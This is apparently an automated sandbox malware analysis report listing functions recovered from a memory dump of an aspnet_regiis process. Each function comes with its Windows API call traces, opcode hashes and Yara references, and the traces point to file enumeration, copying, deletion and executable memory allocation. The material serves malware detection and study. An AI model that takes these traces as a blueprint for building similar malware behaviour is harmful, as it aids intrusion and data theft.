                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                                                              • Opcode ID: d2311854abefe034e0e3780357851736cc074abdbd1253d486b54aea4fe29ca4
                                                                                                                                                                              • Instruction ID: e01f555881b67e4d4132ca3853c5806c61392da0778ddfa7dfaa0e9f80383b91
                                                                                                                                                                              • Opcode Fuzzy Hash: d2311854abefe034e0e3780357851736cc074abdbd1253d486b54aea4fe29ca4
                                                                                                                                                                              • Instruction Fuzzy Hash: 0831A872C8011CAFDB05EB60DD82EE9777EFB48310F440999A90AA3110EE31DBA09F91
                                                                                                                                                                              Function 02A077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,02A07C18,?,?), ref: 02A0784A
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02A07874
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                              • Opcode ID: 118aa161d4c57619a928e3f95566294e6e28b61ffef584296ab069f10dcfaabb
                                                                                                                                                                              • Instruction ID: f580a7b2c5f71ba5bd75ebbab55fe4baa037511d15839a810041c35a8945e8a6
                                                                                                                                                                              • Opcode Fuzzy Hash: 118aa161d4c57619a928e3f95566294e6e28b61ffef584296ab069f10dcfaabb
                                                                                                                                                                              • Instruction Fuzzy Hash: A5117F71A40705ABC724CFB9DDC5BAAF7F4EB40714F24492DE55AD7280EA70B984C614
                                                                                                                                                                              Function 02A1CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • malloc.MSVCRT ref: 02A1CBC9
                                                                                                                                                                                • Part of subcall function 02A1BB6C: lstrlen.KERNEL32(?,02A1CBDA,02A1CC7C,00000000,06400000,00000003,00000000,02A1757F,.exe,02A36C5C,02A36C58,02A36C54,02A36C50,02A36C4C,02A36C48,02A36C44), ref: 02A1BB9E
                                                                                                                                                                                • Part of subcall function 02A1BB6C: malloc.MSVCRT ref: 02A1BBA6
                                                                                                                                                                                • Part of subcall function 02A1BB6C: lstrcpy.KERNEL32(00000000,?), ref: 02A1BBB1
                                                                                                                                                                              • malloc.MSVCRT ref: 02A1CC06
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2974738957-0
                                                                                                                                                                              • Opcode ID: b2212fec567117c1da25f445b290e234b7ffb84c8bdcbac0975a90a9c15bff6a
                                                                                                                                                                              • Instruction ID: ad0e3aea15008e254a9eff82c5f2887aec07352c5d8e8514b6d849ebf6d3316c
                                                                                                                                                                              • Opcode Fuzzy Hash: b2212fec567117c1da25f445b290e234b7ffb84c8bdcbac0975a90a9c15bff6a
                                                                                                                                                                              • Instruction Fuzzy Hash: 75F0B47A589215ABD7206FAAED4091ABB96FB447B4F054523EE08DB250DE30DC11C7B2
                                                                                                                                                                              Function 02A184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 199be4f181c0d7eab8ea107b01fac6d22f47b94d037dd4c2175186a33604df0b
                                                                                                                                                                              • Instruction ID: 172c2096e548c02714c5c999a3ee0ad6b6ae282bc8565d204ba9ec38a7387286
                                                                                                                                                                              • Opcode Fuzzy Hash: 199be4f181c0d7eab8ea107b01fac6d22f47b94d037dd4c2175186a33604df0b
                                                                                                                                                                              • Instruction Fuzzy Hash: 06515E71941200AFEE717BEE92C9BB8F6D7EFA4338F140486E4188A136DF2D89844E51
                                                                                                                                                                              Function 02A07BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 049b4271b368f44ff3a2dd87f0e52ba0835dc33d4d0fa5a3db4acb635d7fc430
                                                                                                                                                                              • Instruction ID: 53708bbef46ef7173f9bba6e358476952c30b4813155582d6c40307b37e0bf7b
                                                                                                                                                                              • Opcode Fuzzy Hash: 049b4271b368f44ff3a2dd87f0e52ba0835dc33d4d0fa5a3db4acb635d7fc430
                                                                                                                                                                              • Instruction Fuzzy Hash: 58319C71E002149FDF16DF59EDC09ADFBB2EF84360B20415AD515AB290DF30AA81CF90
                                                                                                                                                                              Function 02A11DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1699248803-0
                                                                                                                                                                              • Opcode ID: de1b1f0d0a0b2d02a35bd2244b8dcaea3b6c5781ca62a4ae122468a7d9e4cca9
                                                                                                                                                                              • Instruction ID: 47256ccab5fad08f720846485074452d33a6daa5fc7df7487c88bd9bfabf0416
                                                                                                                                                                              • Opcode Fuzzy Hash: de1b1f0d0a0b2d02a35bd2244b8dcaea3b6c5781ca62a4ae122468a7d9e4cca9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF03071E4015DABDB15DF78DC509AEB7FDEB44210F0005B5A905D3140DA30DF458F90
                                                                                                                                                                              Function 02A11D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: af3e6f901a0d29f7d341dd59802f9049676a1ea82b41c2d5beab992b3759b59f
                                                                                                                                                                              • Instruction ID: 69f1a3b3d1085db76bd3457846183330f940f38f9f4e278b60ed943357431be7
                                                                                                                                                                              • Opcode Fuzzy Hash: af3e6f901a0d29f7d341dd59802f9049676a1ea82b41c2d5beab992b3759b59f
                                                                                                                                                                              • Instruction Fuzzy Hash: A8D0A731D40338574B5156ACFC8459EBB19CB056F47044360FE6DDA1E0CB209DA247D0
                                                                                                                                                                              Function 02A1C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                              • Opcode ID: db1d6af5acd066d91e30403356a157be2d1f8d3fb3904a5adefdb7abb444fcdc
                                                                                                                                                                              • Instruction ID: 69caa03814b402e178ef362ea9c8bd70055b3b3cbea1363d91bc17eb90e8a878
                                                                                                                                                                              • Opcode Fuzzy Hash: db1d6af5acd066d91e30403356a157be2d1f8d3fb3904a5adefdb7abb444fcdc
                                                                                                                                                                              • Instruction Fuzzy Hash: 4121D674240B108FC320DF6ED584956B7F5FF49324B1848AEE68A8B722DB72E881CF51
                                                                                                                                                                              Function 02A11E1F Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocLocal
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3494564517-0
                                                                                                                                                                              • Opcode ID: 3cb096e12cfe832a19c68f54d3bfc0096452eaa20cac5aa6b5466f6dbfe7a6eb
                                                                                                                                                                              • Instruction ID: 607d899ea3ea1089956e29e81c93e7db28777f12104ba9f48db74e5b5658221b
                                                                                                                                                                              • Opcode Fuzzy Hash: 3cb096e12cfe832a19c68f54d3bfc0096452eaa20cac5aa6b5466f6dbfe7a6eb
                                                                                                                                                                              • Instruction Fuzzy Hash: 37E0E53AA41B201F83620AAA8844976BA5B9BC2E787584129DF4CCB344DEB1C8018AE0
                                                                                                                                                                              Function 02A07EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                              • Opcode ID: 0225f3be9337294fc91aa7c2c33a01b473051dbff31839b28e86ff707592702a
                                                                                                                                                                              • Instruction ID: cc89095f750ec1c79567bd014ddf1c707e9723e0f6176ecd56c194a700fb2017
                                                                                                                                                                              • Opcode Fuzzy Hash: 0225f3be9337294fc91aa7c2c33a01b473051dbff31839b28e86ff707592702a
                                                                                                                                                                              • Instruction Fuzzy Hash: 7CE0EDB1A10208BFEB40DBA9DD45AADBBF9EB44354F144465EA05D3280EA70EE019B50

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              Function 02A15B0B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 179filestringmemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 02A15B30
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A15B37
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A15B50
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02A15B67
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36A98), ref: 02A15B88
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36A9C), ref: 02A15BA2
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A15C86
                                                                                                                                                                                • Part of subcall function 02A1580D: _memset.LIBCMT ref: 02A15845
                                                                                                                                                                                • Part of subcall function 02A1580D: _memset.LIBCMT ref: 02A15856
                                                                                                                                                                                • Part of subcall function 02A1580D: lstrcat.KERNEL32(?,00000000), ref: 02A15881
                                                                                                                                                                                • Part of subcall function 02A1580D: lstrcat.KERNEL32(?), ref: 02A1589F
                                                                                                                                                                                • Part of subcall function 02A1580D: lstrcat.KERNEL32(?,?), ref: 02A158B3
                                                                                                                                                                                • Part of subcall function 02A1580D: lstrcat.KERNEL32(?), ref: 02A158C6
                                                                                                                                                                                • Part of subcall function 02A1580D: StrStrA.SHLWAPI(00000000), ref: 02A1596A
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A15CA9
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A15BC9
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
